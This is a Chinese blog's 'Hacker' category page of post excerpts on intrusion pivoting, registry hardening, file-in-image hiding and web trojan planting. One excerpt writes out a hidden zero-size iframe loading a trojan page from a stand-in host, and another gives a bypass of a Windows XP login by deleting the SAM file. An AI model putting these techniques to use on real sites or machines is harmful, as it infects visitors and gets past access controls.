随笔分类 -  Hacker

摘要：网络入侵，安全第一。一个狡猾、高明的入侵者，不会冒然实行动。他们在入侵时前会做足功课，入侵时会通过各种技术手段保护自己，以防被对方发现，引火烧身。其中，跳板技术是攻击者通常采用的技术。下面笔者结合实例，解析攻击入侵中的跳板技术。 1、确定目标攻击者在通过扫描工具进行定点(IP)扫描或者对某IP段扫描的过程中发现了该系统(服务器)的某个漏洞，然后准备实施攻击。 比如，笔者通过对某IP段的扫描，发现该... 阅读全文

摘要：众所周知，操作系统的注册表是一个藏龙卧虎的地方，所有系统设置都可以在注册表中找到踪影，所有的程序启动方式和服务启动类型都可通过注册表中的小小键值来控制。　　然而，正因为注册表的强大使得它也成为了一个藏污纳垢的地方。病毒和木马常常寄生在此，偷偷摸摸地干着罪恶勾当，威胁着原本健康的操作系统。如何才能有效地防范病毒和木马的侵袭，保证系统的正常运行呢?今天笔者将从服务、默认设置、权限分配等九个方面入手为大... 阅读全文

摘要：秘诀1：大家知道，WindowsXP的密码存放在系统所在的Winnt\System32\Config下SAM文件中，SAM文件即账号密码数据库文件。当我们登录系统的时 候，系统会自动地和Config中的SAM自动校对，如发现此次密码和用户名全与SAM文件中的加密数据符合时，你就会顺利登录;如果错误则无法登录。既然如此，我们的第一个方法就产生了：删除SAM文件来恢复密码。　　如果你不用管本来系统卡包... 阅读全文

摘要：该技巧适合 Windows 2000 / XP / Vista* 最好有基本的命令行知识。不过也没关系，按照下面的步骤做就行了。准备：1.一张图片 2.一个做试验的txt文件 3.WinRAR步骤：1：准备一张图片，比如 winshome.jpg。准备目标文件，比如test.txt。我们要实现把test.txt隐藏在图片里面。2：把要隐藏的文件 test.txt 用 WinRAR 压缩。生成 test.rar 压缩包3：打开命令行提示符：点击“开始→运行”，输入“cmd”。4：我们假设中两个文件都存放在“ D:”下。输入命令：copy /b D:winshome.jpg + D:test.ra 阅读全文

摘要：1，挂马的N种方法 (1) HTML挂马法。 常规的HTML挂马方法一般是在网页中插入一条iframe语句，像<iframe src=http://www.xxx.com/horse.html width=0 height=0></iframe>。查看站点是否被挂，一般是查找一下关键词iframe。 (2) 再隐藏一点的就是js挂马了。 像再原来的网页中写入<scr... 阅读全文

摘要：把下面代码复制下来存为文本文档,命名为97。在DOS下，切换到97所在目录下输入“debug <97.txt”。运行后自动生成一个可执行文件，进去是一个3D游戏的旋转界面，还有一段美妙的音乐！e100 33 f6 bf 0 20 b5 10 f3 a5 8c c8 5 0 2 50 68 13 1 cb e 1f be a1 1 bf 0 1 e11b 6 57 b8... 阅读全文

摘要：基本思路为，寻找开始菜单按钮窗口，并模拟用户单击void pop(){User32.EnumWindows(new EnumProc(Enum), 0);}private bool Enum(IntPtr hWnd, uint param){User32.STRINGBUFFER buffer=new User32.STRINGBUFFER();User32.GetClassName(hWnd, ref buffer, 256);if (buffer.szText == "Shell_TrayWnd"){User32.EnumChildWindows(hWnd, new E 阅读全文

摘要：相对于 WebService 来说，采用 .Net Remoting 技术的客户端能够订阅服务器端事件，这个功能简直太棒了。 如果想利用该技术作一个简单而又典型的应用，信息广播程序是一个不错的选择。以下代码是一个简单的广播程序，当然，它实在太简陋了。 服务端： Code classProgram { staticvoidMain(string[]args) { BinaryServerFormatterSinkP... 阅读全文